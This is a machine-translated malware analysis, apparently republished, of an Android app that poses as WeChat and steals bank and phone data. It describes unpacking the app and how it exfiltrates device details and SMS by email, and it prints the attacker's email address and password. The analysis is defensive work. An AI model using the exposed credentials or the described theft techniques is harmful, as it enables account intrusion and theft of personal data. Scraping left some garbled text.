Analysis of a reinforcement virus disguised as WeChat

Source: Internet
Author: User

Analysis of a disguised reinforcement Virus

Not long ago, there was a disguised virus on the Internet. After a long time, I had an analysis of the virus, so I tried it.

The icon after the virus is installed is shown in:

After the application is opened, the system prompts you to activate the Administrator:

After activation, you are required to add bank card information, including name, ID card number, and mobile phone number. <喎?http: www.bkjia.com kf ware vc " target="_blank" class="keylink"> VcD48cD48aW1nIHNyYz0 = "http://www.bkjia.com/uploads/allimg/140919/042R25025-4.png" data-ke-src = "http://www.bkjia.com/uploads/allimg/140919/042R25025-4.png" alt = "\"/>

In addition, we found the package name through the AndroidManifest. xml file:

Through the above information, we can basically guess that the disguised application is a virus that steals user bank accounts and related information.

Decompile the apk and find that the virus has been reinforced. We can see that the class com. secapk. wrapper. ApplicationWrapper is basically reinforced by "zookeeper.

Fortunately, there is a shelling program on the Internet, and it is decisive:

Decompile the obtained odex file into a smali file, and then decompile it into a dex file (if an error occurs during the re-compilation process, comment out the error part ). Continue to convert it to the jar file for viewing. Now all the cool and cool are coming out:

The following is a detailed analysis. The app registers two broadcast receivers, the first of which is used to register the Device Manager. The second broadcast receiver is used to monitor events such as system startup, SMS reception, and application installation and uninstallation.

When an application is uninstalled, an email is sent. The sent content includes the user's mobile phone number, voicemail number, device ID, IMEI, IMSI, network operator name, and other private information.

If a message is sent to an attacker, the attacker can intercept the message and obtain the sender, content, and time of the message. The email is sent at: lanjiema@126.com, And the password is admin903. The address of the received message is: 12114860@qq.com.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.